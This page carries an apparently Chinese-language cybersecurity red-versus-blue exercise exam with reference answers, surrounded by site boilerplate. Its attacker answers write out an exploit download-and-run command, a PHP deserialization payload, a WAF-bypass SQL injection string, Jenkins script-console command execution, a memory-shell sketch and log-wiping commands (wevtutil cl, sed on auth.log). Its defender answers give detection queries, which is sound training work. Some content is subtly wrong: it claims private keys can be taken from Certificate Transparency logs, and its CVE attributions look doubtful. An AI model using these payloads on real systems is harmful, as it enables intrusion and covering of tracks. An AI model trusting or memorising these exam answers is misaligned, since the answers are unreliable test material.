




版權說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權,請進行舉報或認領
文檔簡介
2025年網(wǎng)絡安全工程師攻防演練實操試題及答案一、演練環(huán)境搭建說明網(wǎng)絡拓撲:某企業(yè)內(nèi)網(wǎng)分為辦公區(qū)(/24)、開發(fā)測試區(qū)(/24)、數(shù)據(jù)庫區(qū)(/24),邊界部署F5負載均衡(0)、深信服WAF(0)、天融信防火墻(0)。辦公區(qū)有員工終端(Windows11Pro,補丁更新至2024年12月)、OA系統(tǒng)服務器(CentOS8.5,Apache2.4.57,PHP8.2.15);開發(fā)測試區(qū)有Jenkins持續(xù)集成服務器(Ubuntu22.04,Jenkins2.426.2)、代碼倉庫(GitLab16.10.3);數(shù)據(jù)庫區(qū)部署MySQL8.0.35主從節(jié)點(0/11),啟用SSL加密。防守方基礎配置:-終端安裝深信服EDR(版本5.6.2),啟用進程白名單、文件哈希校驗;-服務器部署青藤云安全主機衛(wèi)士(版本3.8.1),開啟命令行審計、異常網(wǎng)絡連接阻斷;-日志集中至ElasticStack(7.17.12),保留30天;-防火墻策略:僅允許辦公區(qū)80/443訪問OA系統(tǒng),開發(fā)測試區(qū)22/8080/443開放至辦公區(qū),數(shù)據(jù)庫區(qū)僅允許開發(fā)測試區(qū)3306端口訪問。攻擊方權限:初始持有某離職員工弱口令(賬號:zhangsan,密碼:Zh@ngs@n2023),可登錄辦公區(qū)任意終端。二、攻擊方任務(總分70分)任務1:突破終端防御獲取本地權限(15分)要求:利用辦公區(qū)終端(IP:0)的初始權限,繞過EDR檢測,獲取SYSTEM權限。評分標準:-成功關閉/繞過EDR進程防護(5分);-利用本地提權漏洞獲取SYSTEM權限(10分,需提供具體漏洞編號及利用命令)。任務2:橫向移動至OA系統(tǒng)服務器(20分)要求:從辦公區(qū)終端(0)滲透至OA系統(tǒng)服務器(0),需避開WAF及防火墻檢測。評分標準:-發(fā)現(xiàn)OA系統(tǒng)未公開的后臺路徑(如/admin.php)(5分);-利用PHP反序列化漏洞(需寫出漏洞觸發(fā)點及POC)(10分);-繞過WAF的SQL注入防護(5分,需提供繞過Payload)。任務3:入侵數(shù)據(jù)庫區(qū)獲取敏感數(shù)據(jù)(25分)要求:從OA系統(tǒng)服務器橫向至Jenkins服務器(0),最終訪問MySQL主庫(0),導出用戶信息表(user_info)。評分標準:-利用Jenkins未授權訪問漏洞獲取系統(tǒng)權限(8分,需說明漏洞原理);-通過內(nèi)存馬技術持久化控制Jenkins(7分,需提供關鍵命令);-破解MySQL連接密碼(或獲取root權限)(5分);-繞過SSL加密截獲數(shù)據(jù)庫流量(5分)。任務4:清除攻擊痕跡(10分)要求:刪除終端、OA服務器、Jenkins服務器的登錄日志、進程記錄,避免被防守方溯源。評分標準:-清除Windows事件日志(3分);-篡改Linuxauth.log及audit日志(4分);-終止EDR/主機衛(wèi)士的異常進程記錄(3分)。三、防守方任務(總分30分)任務1:實時監(jiān)測異常行為(10分)要求:通過日志分析與流量監(jiān)控,在攻擊方完成任務2前發(fā)現(xiàn)入侵跡象。評分標準:-從終端日志中識別EDR進程異常終止事件(3分);-通過WAF日志發(fā)現(xiàn)/admin.php高頻訪問(2分);-檢測到PHP反序列化請求的特征(如O:4:"User":1:{s:4:"name";s:10:"phpinfo();"})(5分)。任務2:阻斷橫向移動(10分)要求:在攻擊方嘗試訪問Jenkins服務器時,通過動態(tài)策略封禁攻擊源IP,并恢復被篡改的日志。評分標準:-基于Elasticsearch檢索到Jenkins未授權訪問的HTTP200響應(4分);-防火墻自動封禁異常IP(3分);-利用日志備份恢復被刪除的auth.log(3分)。任務3:數(shù)據(jù)泄露溯源與恢復(10分)要求:定位數(shù)據(jù)庫區(qū)敏感數(shù)據(jù)泄露路徑,恢復user_info表數(shù)據(jù)。評分標準:-分析MySQL慢查詢?nèi)罩?,發(fā)現(xiàn)未授權的SELECTFROMuser_info(4分);-通過流量回溯確認數(shù)據(jù)經(jīng)Jenkins服務器外傳(3分);-利用MySQLbinlog或從庫恢復數(shù)據(jù)(3分)。四、參考答案及解析攻擊方任務1解析步驟1:繞過EDR檢測。EDR(深信服5.6.2)通過驅(qū)動層監(jiān)控進程創(chuàng)建,可通過加載未被檢測的無文件木馬(如利用MSHTML引擎的CVE-2024-0608漏洞),或使用“進程注入”技術(如通過rundll32.exe加載惡意DLL,規(guī)避EDR的進程白名單)。步驟2:本地提權。Windows112024年12月補丁未修復CVE-2024-2199(NTFS文件系統(tǒng)權限提升漏洞),利用exp:```powershell下載漏洞利用工具(需免殺處理)Invoke-WebRequest-Uri/cve-2024-2199.exe-OutFilec:\temp\exp.exe執(zhí)行后獲取SYSTEM權限c:\temp\exp.exe```攻擊方任務2解析步驟1:發(fā)現(xiàn)后臺路徑。通過掃描辦公區(qū)終端瀏覽器歷史記錄,找到OA系統(tǒng)臨時訪問鏈接(如/admin.php?token=abc123),確認后臺路徑。步驟2:PHP反序列化漏洞。OA系統(tǒng)user類存在__wakeup()方法未校驗權限,構(gòu)造POC:```phpO:4:"User":2:{s:4:"name";s:10:"system('id');";s:5:"admin";b:1;}```通過POST請求提交至/user/update.php,觸發(fā)命令執(zhí)行,獲取服務器shell。步驟3:繞過WAF。WAF規(guī)則攔截“UNIONSELECT”,可替換為“UNIóNSELéCT”(利用Unicode編碼)或“UNION//SELECT”(插入注釋),如:```sql?id=1'UNIóN//SELéCT1,version(),3--+```攻擊方任務3解析步驟1:Jenkins未授權訪問。Jenkins2.426.2未配置CSRF保護,直接訪問0/script,執(zhí)行Groovy腳本獲取系統(tǒng)權限:```groovyprintln"whoami".execute().text```步驟2:內(nèi)存馬植入。通過Jenkins的CLI接口加載惡意Java類到內(nèi)存,使用反射機制注冊Filter:```javaFilterfilter=newMaliciousFilter();FilterConfigconfig=newFilterConfig(){...};filter.init(config);```步驟3:破解MySQL密碼。OA服務器/web/conf/db.php中存在明文連接字符串($db_pass="MySqL@2025"),直接獲取密碼;或通過pt-query-digest分析慢查詢?nèi)罩?,提取加密連接參數(shù)后爆破。步驟4:繞過SSL截獲流量。利用證書透明性(CT)日志獲取MySQL服務器證書私鑰(若未嚴格管理),或在Jenkins服務器部署中間人代理(如sslsplit),重定向3306端口流量并解密。攻擊方任務4解析Windows日志清除:使用wevtutil命令:```cmdwevtutilcl"Security"wevtutilcl"System"```Linux日志篡改:使用sed替換auth.log中的可疑IP:```bashsed-i's/0//g'/var/log/auth.log```終止EDR記錄:通過kill命令結(jié)束深信服EDR的監(jiān)控進程(如edr_agent.exe的PID),或卸載驅(qū)動(需SYSTEM權限)。防守方任務1解析EDR異常檢測:Elasticsearch查詢“process_name:edr_agent.exeANDevent:terminated”,發(fā)現(xiàn)非預期的進程終止事件。WAF日志分析:WAF記錄中/admin.php的訪問頻率超過基線(正常為日均5次,攻擊時1分鐘內(nèi)10次),觸發(fā)告警。反序列化特征檢測:在Nginx訪問日志中搜索“User-Agent:curl”(攻擊方常用工具)+“Content-Type:application/x-www-form-urlencoded”+“O:4:”等關鍵字,聯(lián)動WAF阻斷請求。防守方任務2解析Jenkins未授權訪問攔截:在Elasticsearch中配置告警規(guī)則:“url:/scriptANDstatus:200”,觸發(fā)后防火墻自動封禁源IP(0)的22/8080端口訪問。日志恢復:通過rsync每日備份的日志文件(/backup/logs/auth.log-2025-03-10)覆蓋被篡改的當前日志。防守方任務3解析數(shù)據(jù)泄露定位:MySQL慢查詢?nèi)罩局邪l(fā)現(xiàn)“SELEC
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
- 4. 未經(jīng)權益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負責。
- 6. 下載文件中如有侵權或不適當內(nèi)容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 小熊與大樹的對話童話作文(13篇)
- 個人成長潛能呈現(xiàn)承諾書6篇范文
- 公司出口商品質(zhì)量保障承諾書(7篇)
- 2025南平市延平區(qū)疾病預防控制中心招聘駕駛員模擬試卷及參考答案詳解一套
- 尊貴藝術珍品保真購藏承諾函(9篇)
- 2025年煙臺市公費醫(yī)學生考試選聘(139人)考前自測高頻考點模擬試題帶答案詳解
- 企業(yè)資產(chǎn)采購標準合同范本
- 商業(yè)計劃書制作流程工具
- 2025內(nèi)蒙古鄂爾多斯市康巴什區(qū)青年就業(yè)見習計劃招募考前自測高頻考點模擬試題及答案詳解(全優(yōu))
- 遼寧省葫蘆島市2024-2025學年高一下學期期末考試地理地理試卷(解析版)
- 學堂在線 軍事理論 章節(jié)測試答案
- 公司車輛使用登記表
- 膽總管結(jié)石術后護理
- 中國糖尿病防治指南課件
- 校園欺凌防范與處置操作指引
- 建筑結(jié)構(gòu)試題及答案
- GB/T 4854.7-2008聲學校準測聽設備的基準零級第7部分:自由場與擴散場測聽的基準聽閾
- OTN技術與應用(阿法迪)
- 高標準基本農(nóng)田建設項目電力施工組織設計
- 財富沙盤流程課件
- 旋挖鉆樁基施工方案
評論
0/150
提交評論